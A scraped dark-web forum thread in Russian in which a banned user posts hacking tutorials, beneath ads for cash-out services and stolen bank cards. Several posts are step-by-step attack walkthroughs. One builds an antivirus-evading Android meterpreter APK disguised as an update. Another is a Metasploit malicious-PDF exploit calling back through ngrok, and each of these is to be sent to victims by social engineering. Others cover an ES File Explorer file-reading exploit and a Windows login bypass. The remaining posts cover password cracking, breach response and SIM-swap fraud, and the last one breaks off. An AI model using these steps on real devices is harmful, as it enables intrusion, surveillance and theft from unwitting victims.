TARANTINO OBNAL SERVICE №1 на рынке теневых услуг.
Депозит 1 млн.


✔️ Профессиональное сопровождение любых финансовых операций.

✔️ Россия, страны СНГ и Европы:

  • ➢ ФИЗ / ЮР лица
  • ➢ Мерчанты
  • ➢ ЭПС
  • ➢ Sim-карты
  • ➢ Работа с криптой по всему миру
  • ➢ Денежные переводы
ПЕРЕЙТИ К ТЕМЕ

ДЕБЕТОВЫЕ КАРТЫ СБЕРМАРКЕТ
  • ⭐️ Пожизненная гарантия от краж.
  • ⭐️ Все в наличии. Экспресс-доставка. Лучшие цены.
  • ⭐️ Ветка 2021 года. Сотни отзывов.
  • ⭐️ Статус Ветеран на ДаркМани.
  • ⭐️ Депозит миллион ₽.
КАРТЫ РФ 🇷🇺
КАРТЫ ГРУЗИИ 🇬🇪
ЛК КАЗАХСТАНА 🇰🇿


БОЛЕЕ 1000 КОМПЛЕКТОВ ДРУГИХ ТОПОВЫХ БАНКОВ ВСЕГДА В НАЛИЧИИ

>>> ПЕРЕЙТИ К ТЕМЕ <<<
Telegram: https://t.me/SberMarketTG

У форума есть зеркало в Тор http://darkmonn6oy55o7kgmwr4jny2gi2zj6hyalzcjgl444dvpalannl5jid.onion
Официальный канал Darkmoney в Телеграм https://t.me/+k1c69d6xQsswYzU0
NEW! 🔥 Чат Darkmoney в Телеграм https://t.me/+q40pcoHjSRVmNTE0

Blackmast_education

Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как обойти антивирус с помощью Apk Wash

356eede9661b39d11d57acbd3aaab97d.jpg



Вступить в наш чатАнтивирусы — чрезвычайно полезные инструменты — но не в тех ситуациях, когда вам нужно оставаться незамеченным в атакуемой сети. Обход антивируса на андроиде — одна из самых сложных задач. Ну, по крайней мере, так было раньше, пока у нас не появились такие инструменты, как Apk Bleach и Apk Wash, которые могут скрыть вредоносные приложения от обнаружения антивирусами. Сегодня мы покажем, как хакеры обходят антивирусную защиту на андроиде, избежав обнаружения во время взлома и тестирования на проникновение.


5e3f3250d9a8b8ff9cf5f8354d96d83f.jpg



Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.​
Возможности инструмента


  • Stealth option — этот параметр позволяет вам определить количество сеансов эксплойта, которые будут созданы.
  • Icon injection — с помощью этой опции выберите значок, который вы хотите отобразить на устройстве жертвы. Вы также можете создать свою собственную иконку.
  • Application renaming —придумайте название вашему приложению.
  • Signing the apk — подпишите apk. Поскольку msfvenom создает неподписанные приложения для Android, иструмент использует jar signer для подписи сгенерированных полезных нагрузок.
Apk Wash также позволяет построчно редактировать разрешения. Инструмент просматривает каждое из разрешений и запрашивает разрешение на их удаление или сохранение.
Установка инструмента

Шаг 1: Загрузите Apk Wash и клонируйте его в Kali Linux с помощью следующей команды:
git clone https://github.com/jbreed/apkwash.git Шаг 2: Предоставьте разрешения инструменту с помощью следующей команды, как показано ниже:
****d +x apkwash mv apkwash /usr/local/bin/. Шаг 3: Теперь мы можем использовать следующую команду для создания вредоносного файла:
Ниже приведены параметры, которые вы можете использовать, чтобы создать вредоносные файлы:
-p | –payload <payload> Устанавливает полезную нагрузку, которая будет сгенерирована msfvenom.
-о | –output <outfile.apk> Задает имя созданного APK, а также файл apk.
-х | –original <infile.apk> APK для внедрения полезной нагрузки.
-g | –generate Генерирует полезную нагрузку, используя значения по умолчанию.
-n | –newkey Генерирует новый ключ отладки перед подписью.
-v | – verbose Показывает вывод команд.
-d | – d***g Оставляет файлы /tmp/payload на месте для просмотра.
-h | – help Справочная информация.
apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 -o update.apk Шаг 4: Теперь у вас есть вредоносный apk-файл, который нельзя обнаружить антивирусом. Существует всего несколько антивирусов, которые могут помечать этот файл как вирус, но это случается очень редко.
Теперь отправьте ваше приложение жертве, используя методы социальной инженерии. Убедитесь, что жертва загрузит и установит приложение на свой андроид, после чего вы сможете удаленно отправлять команды на ее устройство. Стоит отметить, что установка проходит гладко, без каких-либо подозрительных уведомлений от Google Play Protect.
Заключение

Наверняка вы сталкивались с ситуациями, когда доступ к атакуемой сети получен и от заветной цели вас отделяет всего один маленький шаг, а антивирус не позволяет вам сделать этот шаг (например, не дает запустить нужную программу). Во многих случаях у вас есть только одна попытка — и она терпит неудачу из-за тревоги, поднятой антивирусом. Иногда антивирусы удаляют абсолютно безобидные файлы, а не только исполняемые. В результате скрыть реальную угрозу становится крайне сложно. В этой ситуации на помощь приходит Apk Wash, который не даст антивирусу себя обнаружить. Сегодня вы не только узнали о существовании такого нужного инструмента, но и научились использовать его на практике. На этом все. Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Взлом ОС Windows с помощью Adobe PDF

Взлом ОС Windows с помощью Adobe PDF

17453a67d7d9ab2a44a16bbdea567bc4.jpg




В этой статье мы узнаем, как хакеры взламывают Windows 10 с помощью эксплойта Adobe PDF. Мы будем использовать инструмент Ngrok для переадресации портов, который доступен для Linux, Windows и macOS. Ngrok помогает осуществить взлом через Интернет и атаковать за пределами локальной сети.​
993feac270fada6188a566ecfb9a0f8e.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.​
Взлом Windows с помощью Adobe PDF

Требования:

  • Установленный Kali Linux и Ngrok;
  • Цель должна иметь Adobe Reader версии 8 или 9.
Этапы взлома Windows:
1. Создание вредоносного PDF-файла с помощью Metasploit;
2. Переадресация портов с помощью Ngrok, чтобы взлом работал через Интернет;
3. Запуск прослушивателя для вредоносной полезной нагрузки с помощью Msfconsole.
1. Создание вредоносной полезной нагрузки с использованием Metasploit Framework

Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы запустить Metasploit:
msfconsole

Шаг 2: Существует множество эксплойтов Windows. В этом мануале мы будем использовать эксплойт Adobe pdf. Вы же можете выбрать любой другой эксплойт.
Введите следующую команду, чтобы использовать эксплойт Adobe PDF:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Шаг 3: Теперь, когда мы выбрали эксплойт, нам нужно указать полезную нагрузку для внедрения во вредоносный файл Adobe PDF. Для этого введите следующую команду:
set payload windows/meterpreter/reverse_tcp
2. Переадресация портов с помощью Ngrok

Шаг 4: Теперь нам нужно запустить службу Ngrok, чтобы мы могли использовать переадресацию портов на нашей машине. Чтобы запустить службу ngrok, введите следующую команду:
./ngrok tcp 1234
Шаг 5: После того, как вы запустили службу Ngrok, вы увидите следующее:
Адрес перед двоеточием (:) — это ваш LHOST, а после двоеточия — LPORT: см. изображение ниже:

a252e859ee2fe6423558636cae0ef11e.jpg


Примечание: ваши LHOST и LPORT будут отличаться от тех, что видите на скриншоте. Замените их на LHOST и LPORT.
Если вы хотите использовать взлом в локальной сети, то замените LHOST и LPORT на свой собственный локальный IP-адрес. Вы можете узнать его с помощью команды ifconfig.
Шаг 6: Теперь, чтобы настроить LHOST, введите следующую команду:
set LHOST 0.tcp.ngrok.io
Шаг 7: Чтобы настроить LPORT, введите следующую команду:
set LPORT 13288
Шаг 8: Установите имя файла:
set FILENAME test.pdf
Шаг 9: Введите следующее, чтобы запустить эксплойт и создать вредоносный pdf-файл:
exploit
Таким образом, Metasploit создал файл Adobe PDF с именем test.pdf. Metasploit по умолчанию поместит файл в /root/.msf4/local/test.pdf. Проверьте этот каталог на наличие вредоносного PDF-файла. После чего вам нужно будет отправить этот PDF-файл жертве, используя приемы социальной инженерии.
3. Создание прослушивателя для вредоносной полезной нагрузки PDF

Чтобы создать прослушиватель для нашего вредоносного эксплойта Adobe pdf, нам нужно ввести следующие команды по порядку:
Шаг 1: Откройте Metasploit в новом терминале Kali Linux:
msfconsole
Шаг 2: Выполните следующие команды в том же порядке, как показано ниже:
use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 1234 exploit Итак, как только жертва откроет вредоносный PDF-файл, будет установлено соединение Meterpreter через прослушиватель Metasploit. Далее вы сможете выполнять все остальные действия. Просто введите help, чтобы увидеть список всех возможных взломов.
Поздравляем, вы успешно взломали Windows с помощью вредоносного pdf-файла.





 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как хакеры взламывают пароли - ТОП 7 способов

Как хакеры взламывают пароли - ТОП 7 способов


Первое, что приходит на ум, когда мы слышим слово «безопасность», — это «пароль». Однако, большинство людей не уделяют особого внимания своей безопасности, что приводит к большому количеству киберпреступлений и появлению инструментов для взлома паролей, таких как атака по словарю, атака перебором, атака по маске и многое другое. Знания о различных методах взлома паролей необходимы не только хакеру, но и обычному пользователю, чтобы предотвратить возможные взломы.​
Итак, сегодня мы вам расскажем о 7 наиболее популярных способах взлома паролей, и как защититься от них.

33e9326a8a8749f254ec60990954b4dc.jpg


Атака по словарю
Суть атаки по словарю заключается в следующем: злоумышленник загружает в целевую систему файл словаря, который работает с учетными записями пользователей. Такой способ взлома в некоторой степени устраняет случайность атаки методом грубой силы и сокращает время, необходимое для поиска пароля, при условии, что пароль присутствует в словаре. Чем проще и тривиальнее пароль пользователя, тем быстрее и успешнее результат атаки.
Чтобы предотвратить атаку по словарю, все, что мы можем сделать, это усложнить наши пароли, используя комбинацию различных букв, символов и цифр для большей безопасности.​
Атака радужной таблицы

Атака радужной таблицы — это тип взлома, при котором злоумышленник пытается использовать радужную хэш-таблицу для взлома паролей, хранящихся в системе базы данных. Радужная таблица - это хеш-функция, используемая в криптографии для хранения важных данных, таких как пароли, в базе данных. Сервер хранит все пароли в виде хеш-строки, чтобы предотвратить любое неправильное использование паролей. Используя радужную таблицу, злоумышленник может быстро найти в базе утекших хешей паролей простые комбинации и использовать их для взлома систем.
Чтобы предотвратить эту атаку, нужно использовать технику, называемую «Солением». Соление — это процесс добавления уникальных случайных строк символов к паролям в базе данных или к каждому паролю перед хэшированием. Это сделано для изменения хэша и повышения безопасности паролей. Строка символов, добавляемая к паролю, называется солью.​
Атака грубой силы

Атака грубой силы или брутфорс — это способ взлома с угадыванием паролей для входа в систему. Злоумышленник стремится взломать пароль, вводя различные комбинации, пока не найдет правильную.
Однако большинство хакеров автоматизируют этот процесс, используя программное обеспечение, которое обрабатывает исчерпывающие комбинации паролей за значительно меньший промежуток времени.
Тем не менее, когда дело доходит до более длинных паролей, брутфорс уже не является таким эффективным по сравнению с другими видами атак, поскольку на маловероятные угадывания тратится слишком много времени.
Если вы обычный пользователь, для защиты от брутфорса необходимо следовать двум несложным правилам: использовать сложные и длинные (от 8-12 символов) пароли, содержащие в себе цифры, маленькие и заглавные буквы, а также символы, а также менять пароль раз в пару месяцев (или хотя бы раз в год), так как вы не знаете, когда ваш пароль попадет в руки злоумышленникам.​
Гибридная атака

Гибридная атака используется, когда злоумышленники имеют какое-то представление о пароле. Этот тип атаки считается очень опасным и эффективным, поскольку сочетает в себе комбинацию брутфорс атаки и словаря на основе увлечений и имен близкий людей пользователя.
Например, пользователи часто добавляют набор цифр в конце своих учетных данных, таких как год окончания или год рождения (например, lena1992 или dima2013). Таким образом, хакеры используют атаку по словарю для генерации фраз, а затем проводят атаку методом перебора последних цифр.
Вместо того чтобы проверять каждый пароль, гибридная атака использует набор учетных данных и создает и пробует незначительные модификации фраз по всему списку, например изменение букв или цифр.
Атака по маске

Злоумышленник использует атаку по маске, когда он уже получил некоторую информацию о пароле. Например, он знает, что пароль начинается с цифры или содержит определенный специальный символ или букву. Эта информация полезна злоумышленнику при настройке маски. В отличие от атаки по словарю, когда злоумышленник использует списки всех возможных комбинаций паролей, атака по маске имеет гораздо более конкретный характер.
Основная цель хакера — сократить время, необходимое для взлома пароля и также исключить любую дополнительную обработку во время взлома пароля.
Вредоносная атака

Вредоносная атака может включать в себя различные инструменты, такие как кейлоггеры, вирусы, шпионские программы, которые предназначены для кражи личных данных.
Злоумышленник устанавливает инструменты на целевое устройство, и они работают в фоновом режиме, собирая информацию о действиях жертвы с помощью нажатий клавиш, снимков экрана и других методов.
Некоторые продвинутые вредоносные программы даже ищут в системе цели словари паролей или данные, связанные с веб-браузерами. Собрав данные с целевого устройства, хакер может легко проанализировать их, чтобы получить пароль.
Атака методом подбора

Если все другие атаки по каким-то причинам терпят неудачу, хакер всегда может попытаться угадать ваш пароль, потому что зачастую он основан на предсказуемости пользователя.
Несмотря на все советы по созданию сложного пароля, большинство пользователей все равно выбирают пароль, который они могут легко запомнить. Эти пароли часто основаны на вещах, вызывающих эмоциональную привязанность (семья, домашние животные). Опытный хакер может легко угадать такой пароль, проведя небольшую OSINT разведку жертвы.
Подбор пароля является энергозатратным способом, однако в некоторых случаях эффективным, поскольку злоумышленник может взломать пароль, не прибегая к атакам по словарю или перебору, и таким образом использовать данные пользователя, даже не будучи замеченным.
Заключение

Хакеры всегда находятся в поиске новых способов взлома паролей, поэтому важно уделять особое внимание созданию надежного пароля, а также следить за новостями, чтобы быть осведомленным о различных типах атак, которым вы можете быть подвержены, и способах защиты от них. Надеемся, что данная статья оказалась полезной для вас. Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Взлом Windows: как хакеры обходят систему безопасности

Взлом Windows: как хакеры обходят систему безопасности

В современную цифровую эпоху тяжело представить жизнь без компьютера. ПК защищают наши личные данные, полагаясь на пароли и различные протоколы безопасности. Так, например, пароль при входе в Windows защищает от стороннего проникновения и доступа к информации. Тем не менее, как и в любой системе, существуют уязвимости, которыми могут воспользоваться опытные хакеры.​
В этой статье мы погрузимся в тему кибербезопасности, чтобы раскрыть секрет обхода пароля Windows и изучить меры предосторожности, которые каждый из нас может предпринять.


3218de0c834d0a8d9e7d15c7e3ae404a.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.​
При включении и перезагрузке компьютера операционная система запросит у вас имя пользователя и пароль, и только после успешной аутентификации вы получите доступ к ресурсам системы. Этот двухэтапный процесс направлен на защиту ваших данных, чтобы избежать несанкционированного доступа.



08dba176999b09826cab3fc6fbed5329.jpg
Методы обхода пароля Windows


  • Атака методом перебора: хакеры используют автоматизированные инструменты, чтобы точно подобрать пароль с помощью разных комбинаций. За короткий промежуток времени хакеры могут легко взломать слабые пароли, тем самым подвергая риску безопасность вашей системы.
  • Кейлоггер: вредоносное программное обеспечение записывает ваши нажатия клавиш, эффективно перехватывая учетные данные для входа в систему по мере их ввода. Впоследствии злоумышленники могут использовать украденные данные для получения несанкционированного доступа.
  • Кража учетных данных: с помощью уязвимостей в программном обеспечении или фишинга хакеры могут обманом заставить пользователей раскрыть свои учетные данные. Этот метод основан на социальной инженерии, что делает его не менее эффективным.
  • Уязвимости Windows: операционные системы могут иметь уязвимости, которые позволяют хакерам получать несанкционированный доступ, используя слабые места в коде. Регулярные обновления программного обеспечения помогают своевременно устранять уязвимости.
  • Одним из самых распространенных и простых способов взлома Windows является использование кнопки «Специальные возможности».
Взлом с помощью «Специальных возможностей»

5926ae6e626180e9e77d532abee993ae.jpg
Кнопка «Специальных возможностей» на экране входа в Windows предназначена для пользователей с ограниченными возможностями, и имеет такие инструменты, как диктор, лупа и экранная клавиатура. Однако коварные хакеры нашли способ превратить эту полезную функцию в способ взломать Windows.
Основная идея этого эксплойта — заменить кнопку «Специальных возможностей» командной строкой, которая предоставляет доступ к интерфейсу командной строки системы. Отсюда хакер может выполнять различные команды для манипулирования системой, включая изменение паролей, создание новых учетных записей и многое другое.
Ниже представлено пошаговое руководство того, как осуществляется этот эксплойт:

  • Доступ к экрану входа в систему. Злоумышленнику необходим физический или удаленный доступ к экрану входа в систему целевого компьютера.
  • Запуск эксплойта. На экране входа в систему злоумышленник нажимает кнопку «Специальных возможностей», которая располагается в правом нижнем углу.
  • Замена Utilman.exe. Далее хакер заменяет приложение диспетчера утилит (utilman.exe) на cmd.exe (командная строка), переименовывая файлы. Это можно сделать с помощью внешнего загрузочного носителя или другими способами, если злоумышленник уже имеет доступ к системе.
453291cc46cb5b11e6dadb7c93a09431.jpg

  • Выполнение команд. После нажатия кнопки вместо запуска инструментов специальных возможностей запускается командная строка с правами администратора.
  • Манипулирование системой. Из командной строки злоумышленник может использовать команды для создания новых учетных записей пользователей, изменения паролей или получения доступа к конфиденциальным файлам и настройкам.
Защита от взлома Windows


  1. Используйте надежные пароли. Создавайте сложные пароли, состоящие из прописных и строчных букв, цифр и специальных символов. Избегайте использования личной информации в пароле, такой как даты рождения или клички животного.
  2. Включите двухфакторную аутентификацию (2FA). Двухфакторная аутентификация добавляет дополнительный уровень безопасности, требуя второго этапа проверки, часто через мобильное приложение или электронную почту, помимо вашего пароля.
  3. Регулярные обновления. Обновляйте свою операционную систему и все программные обеспечения. Обновления часто включают исправления уязвимостей, что снижает риск взлома.
  4. Остерегайтесь фишинга. Будьте осторожны, нажимая на подозрительные ссылки или предоставляя данные для входа на незнакомых веб-сайтах. Хакеры часто используют тактику фишинга для кражи учетных данных.
  5. Антивирус от вредоносных программ. Установите надежное антивирусное программное обеспечение, чтобы обнаружить и предотвратить заражение вашей системы вредоносным ПО.
  6. Брандмауэр. Используйте брандмауэр для мониторинга и контроля входящего и исходящего сетевого трафика, что может помочь предотвратить стороннее проникновение.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Лучшие инструменты для взлома всех времен

Лучшие инструменты для взлома всех времен

С ростом киберпреступности появляются все новые инструменты для взлома. В игру вступают новые механизмы защиты или нападения, которые не всегда являются лучшей заменой старым и проверенным инструментам. Поэтому оставаться в курсе лучших инструментов кибербезопасности – непростая задача. Тем не менее, мы составили для вас подборку Топ-10 инструментов для взлома всех времен.


350e26d39330bacd6bace74688f67f8a.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.​
Brutus

В октябре 2000 года был выпущен Brutus, один из наиболее широко используемых онлайн-инструментов для взлома паролей. Разработчик утверждает, что Brutus является самым быстрым и гибким инструментом для взлома паролей из всех доступных на рынке.
Brutus — бесплатный инструмент, доступный только для клиентов Windows. Он поддерживает ряд аутентификаций, таких как HTTP, Telnet, Pop3, IMAP и т. д. Кроме того, он содержит дополнительные функции, позволяющие пользователям создавать свой собственный тип аутентификации. Несмотря на то, что Brutus давно не обновлялся, он до сих пор остается одним из самых полезных инструментов для взлома паролей.
RainbowCrack

RainbowCrack — это инструмент, который взламывает хэши с использованием радужных таблиц. RainbowCrack поражает своей скоростью, поскольку он взламывает пароли быстрее, чем традиционные инструменты брутфорса.
Разработчики RainbowCrack также успешно создали радужные таблицы MD5, Sha1, NTLM и радужные таблицы LM, которые можно скачать бесплатно и использовать в процессе взлома паролей. Инструмент работает на платформах Windows и Linux и поддерживает вычисления на многоядерных процессорах.
Wfuzz

Wfuzz — это инструмент для взлома паролей, который использует методы грубой силы. Также его можно использовать для обнаружения скрытых ресурсов (каталоги, сценарии и сервлеты). Wfuzz способен обнаруживать различные внедрения, такие как LDAP, SQL и т. д., внутри целевого приложения с возможностью создания инъекций из нескольких точек одновременно. Это бесплатное программное обеспечение, доступное для Windows, macOS и Linux.
Cain & Abel

Cain & Abel — популярный инструмент для взлома паролей, который использует слабые места в системе безопасности. Он работает с сетевыми анализаторами для взлома зашифрованных паролей с помощью атаки по словарю. Cain & Abel будет полезен не только для хакеров, но и для специалистов по сетевой безопасности и тестировщиков.
John the Ripper

John the Ripper — очень известный инструмент для взлома паролей с открытым исходным кодом, доступный для всех платформ, таких как Linux, macOS, Unix, Windows и т. д. Джон потрошитель может легко взломать пароли. Помимо этого, он имеет настраиваемый взломщик с возможностью автоматического определения типов хэшей паролей. У Джона Потрошителя также есть профессиональная версия, которая включает в себя расширенные функции для более быстрого и точного взлома паролей.
THC-Hydra

THC-Hydra — это инструмент для быстрого взлома паролей, который поддерживает множество сервисов. Это один из лучших инструментов для удаленного взлома с помощью перебора, поскольку он использует эффективные атаки по словарю против более чем 30 протоколов, включая FTP, HTTPS, Telnet, SMB и многие другие. Hydra доступен для ряда платформ, включая Solaris, Windows, Linux и т. д..
Medusa

Medusa — еще один популярный инструмент для взлома паролей на основе командной строки. Он поддерживает MS SQL, MYSQL, HTTP, FTP, CVS, SMTP, SNMP, SSH и многие другие протоколы. У Medusa есть отличная возможность выполнять параллельные атаки одновременно на разные системы, это означает, что вы можете взломать несколько приложений одновременно, просто предоставив подробную информацию о целях. Medusa — один из лучших инструментов для взлома паролей всех времен.
OPHCrack

OPHCrack — это инструмент с открытым исходным кодом на основе радужных таблиц для взлома паролей, который является самым популярным средством взлома паролей для устройств под управлением Windows. Он может легко взломать хэши NTLM и LM, а также предоставляет графики в реальном времени для анализа паролей. Одна из его удивительных возможностей заключается в том, что он может импортировать хеши из различных форматов, включая дамп непосредственно из SAM-файлов Windows. OPHCrack также предоставляет на своей платформе Live CD и бесплатные радужные таблицы, чтобы еще больше упростить процесс взлома паролей.
L0phtCrack

L0phtCrack взламывает пароли Windows, ориентируясь на хэши, что делает его лучшей заменой OPHCrack. Он использует основные контроллеры домена, рабочие станции (Windows), сетевые серверы, а также атаку методом перебора и атаки по словарю для получения паролей.
Aircrack-NG

Aircrack-NG — лучший инструмент для взлома паролей сетей WEP и WPA. Это инструмент командной строки, который может работать на всех платформах, таких как Windows, Linux и т.д.. Механизм атаки, используемый этим инструментом, довольно прост. Все, что он делает, это отслеживает и собирает пакеты, и как только будет перехвачено достаточное количество пакетов, он пытается восстановить пароль, что делает атаку намного быстрее по сравнению с другими инструментами взлома WEP.
Заключение

Вышеупомянутые инструменты являются лучшими, когда дело доходит до взлома паролей. Но также они указывают на очень важный аспект: любой пароль в этом мире можно взломать, если у злоумышленника есть соответствующие инструменты для выполнения задачи. Итак, все, что мы можем сделать, это убедиться, что наши пароли являются достаточно надежными, чтобы противостоять любым возможным атакам с помощью этих инструментов.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Утечка данных: что делать, если персональные данные попали в Сеть

90469ebd1ec55e5ba4580080c0019ff6.jpg



Вступить в наш чат
Представьте этот тревожный момент, когда вы узнаете, что ваши данные утекли в сеть. Наверняка, первое, что вы почувствуете — это шок, растерянность и приступ гнева. И это вполне объяснимо, ведь ваши персональные данные под угрозой. Сердце бешено колотится, а разум затуманен тысячей вопросов. Какие данные были скомпрометированы? Как это произошло? Остановитесь. Первый шаг к устранению проблемы — это сделать глубокий вдох. Паника не поможет.

e62c17f958ae0962264ee6af86c00408.jpg


Шаг 1. Проверка подлинности

Получение электронного письма от компании, где произошла утечка может вызвать панику, но есть действия, которые вы можете быстро предпринять, чтобы защитить свой аккаунт и ограничить ущерб. Первое, что необходимо сделать — это проверить подлинность письма. Киберпреступники часто создают убедительные фишинговые электронные письма, чтобы украсть еще больше вашей информации. Поддельные имейлы являются распространенным трюком, которые злоумышленники используют, чтобы выдавать себя за доверенных лиц.
Ни в коем случае не нажимайте ни на какие ссылки и не загружайте вложения из письма. Вместо этого зайдите прямо на официальный сайт компании, если утечка данных, действительно, произошла, то информация об этом должна быть там.
Шаг 2. Оценка ущерба

После подтверждения утечки пришло время оценить ущерб. Прочитайте внимательно, чтобы понять, что случилось. Какие ваши персональные данные входят в утечку. Ваши следующие шаги будут зависеть от этой информации.
Шаг 3. Измените пароли

Основная проблема большинства пользователей интернета — это одинаковые пароли в нескольких сервисах, что позволяет злоумышленникам при первой удобной возможности заполучить доступ к вашим аккаунтам. Итак, вам необходимо придумать новый, уникальный пароль (который больше нигде не используется) для утекшей учетной записи. Если вы не можете войти, свяжитесь с сайтом, чтобы спросить, как восстановить или удалить аккаунт. Видите аккаунт, который не узнаёте? Сайт, возможно, изменил имена или кто-то мог создать аккаунт с помощью вашего адреса электронной почты.
Шаг 4. Включите двухфакторную аутентификацию

Для усиленной безопасности включите двухфакторную аутентификацию (2FA) везде, где это возможно. Этот дополнительный уровень защиты может значительно усложнить жизнь хакера. Обратите особое внимание на аккаунты электронной почты, облачных сервисов, социальных сетей, мессенджеров и сервисов типа iCloud, которые привязаны к вашим персональным устройствам. Начните использовать двухфакторную аутентификацию во всех сервисах, которыми вы пользуетесь, если такая опция доступна.
Шаг 5. Мониторинг финансовых аккаунтов

Следите за выписками из вашего банка и кредитной карты на предмет любых подозрительных действий. Немедленно сообщайте о любых несанкционированных транзакциях в свой банк. Убедитесь, что на ваше имя не было открыто никаких новых счетов, займов или кредитных карт. Иногда утечки могут привести к подозрительной деятельности или краже личных данных.
Шаг 6. Внимание «фишинг»

Будьте осторожны с любыми нежелательными электронными письмами или текстовыми сообщениями, в которых запрашивается личная информация или данные для входа. Не переходите ни по каким ссылкам в этих сообщениях.
Шаг 7. Следите за обновлениями

Если нарушение произошло на предприятии или в организации, свяжитесь с поддержкой и узнайте, что они делают для исправления ситуации. Кроме того, следите за обновлениями и объявлениями от компании, в которой произошла утечка данных, поскольку они могут предоставить важную информацию о том, как защитить себя.
Шаг 8. Проведите аудит безопасности

В целом подобное событие является очень хорошим стимулом для проведения «дня безопасности» и повышения уровня защищенности ваших аккаунтов. Выполните аудит безопасности ваших аккаунтов при помощи сервисов типа Have I been pwned и SpyCloud. Они отслеживают актуальные утечки и могут помочь вам понять, какие аккаунты могли быть скомпрометированы. Удалите старые учетные записи, которыми больше не пользуетесь и обновите настройки конфиденциальности других.
Заключение

Получение уведомления об утечке данных может оказаться ужасающим событием, но помните: вы не одиноки. В конце концов, никто из нас не может существенно повлиять на утечки данных. Чем дольше вы находитесь в Сети, тем больше становится ваш цифровой след, а вместе с ним и больше риски для безопасности. Тем не менее, следуя вышеперечисленным шагам, вам удастся преодолеть «бурные потоки» утечки данных и выйти из воды практически сухим. Знание – сила. Продолжайте следить за нашими статьями по информационной безопасности, чтобы всегда будьте начеку.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как взломать Android с помощью ES File Explorer

e3e03f55f0f739cb01221c87588274e3.jpg



Вступить в наш чат
ES File Explorer — файловый менеджер для устройств Android с широким набором функций. Такие менеджеры нужны, чтобы помогать пользователям управлять файлами на устройстве, а именно — изображениями, музыкой, видео, документами и приложениями. ES Проводник прекрасно работает с root-правами, а про версия без рекламы в буквальном смысле слова является вишенкой на торте. Однако с этим функционалом приходит и повышенный риск взлома злоумышленниками – с чем и столкнулись недавно пользователи приложения. Итак, сегодня мы расскажем, как именно хакерам удается взламывать устройства Android.

15832c97f294f819931581b81b2f49ee.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.​
Как работает эксплойт ES explorer

Уязвимость имеет идентификатор CVE-2019-6447. Это уязвимость, при которой проводник открывает HTTP-сервер при каждом запуске приложения. Этот модуль подключается к HTTP-серверу ES File Explorer для запуска нижеуказанных команд, которые помогают получить доступ к устройству Android. HTTP-сервер запускается каждый раз вместе с приложением и, таким образом, является серьезной уязвимостью. Стоит отметить, что уязвимость была исправлена вместе с новыми обновлениями, поэтому взлом будет работать только на старых версиях приложения.
Как взломать Android с помощью уязвимости ES File Explorer

Шаг 1. Откройте терминал Kali Linux.
Шаг 2. Откройте Metasploit с помощью следующей команды:
msfconsole

f649458019ba05417e96d90a717c65d8.jpg


Шаг 3: Теперь, чтобы начать взламывать Android введите:
use auxiliary/scanner/http/es_file_explorer_open_port

de7a6bbef5b0736941c408d49ca84720.jpg


Шаг 4. Если вы хотите прочитать дополнительную информацию об эксплойте, используйте команду:
info

f88193e304838b7b9c250ac16ecd2d86.jpg


Шаг 5: Чтобы этот хак сработал, вам нужно узнать IP-адрес жертвы. Вы можете использовать Nmap/Zenmap в Kali Linux, чтобы найти целевой IP-адрес. Также вы можете выбрать Zanti, если используете termux и Android.
Введите, чтобы увидеть параметры, которые вы можете установить:
show options

b0a7d4a907b9532d70d0ea9d28b90f6a.jpg
set RHOSTS 192.168.1.20

dfba8f11bebee45f66f671e3af6a36b0.jpg


Как только цель выбрана, вам нужно запустить следующую команду, чтобы просмотреть все доступные параметры:
show actions

f19d62f195b41a068468cb970b656cf6.jpg
set action GETDEVICEINFO

47b164ebf0cbcbb8fc557c10657ebbbf.jpg


Когда действие будет установлено, просто введите run, как показано ниже.


06899a48af40b2b1aa571ece6f7905ef.jpg


Вы получите имя устройства:
Предположим, что мы хотим просмотреть все аудиофайлы на устройстве:
set action LISTAUDIOS

23c1def3bf564ef14f9eee27a6765917.jpg

run

4c35fc4baaf5edcd3d92086f87974c5e.jpg


Итак, вы только что получили доступ к аудиофайлам жертвы. Остальные команды вы можете использовать аналогичным образом. На этом все. Удачи!

 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Скам с заменой SIM-карты: что это такое и как защитить себя

Скам с заменой SIM-карты: что это такое и как защитить себя

Все привыкли думать, что злоумышленники могут украсть деньги с банковской карты, только если сообщить им код с обратной стороны карточки. И действительно, большая часть мошенничеств совершается именно так. Однако сейчас существуют и более изощренные способы, для которых секретные данные не нужны. В этой статье мы прольем свет на **** с заменой симки, а главное поделимся советами, которые помогут обезопасить себя.
ce61c790d41515ddd2574aab7dc8faee.jpg


Что такое **** с заменой SIM-карты

Скам с заменой SIM-карты предполагает тщательно организованный акт мошенничества, в котором киберпреступники берут под контроль ваш номер телефона, чтобы получить доступ к вашим звонкам, текстовым сообщениям и, что самое страшное, к вашим кодам двухфакторной аутентификации (2FA).
Чтобы понять, как разворачивается мошенничество с заменой SIM-карты, важно разобрать его поэтапно:

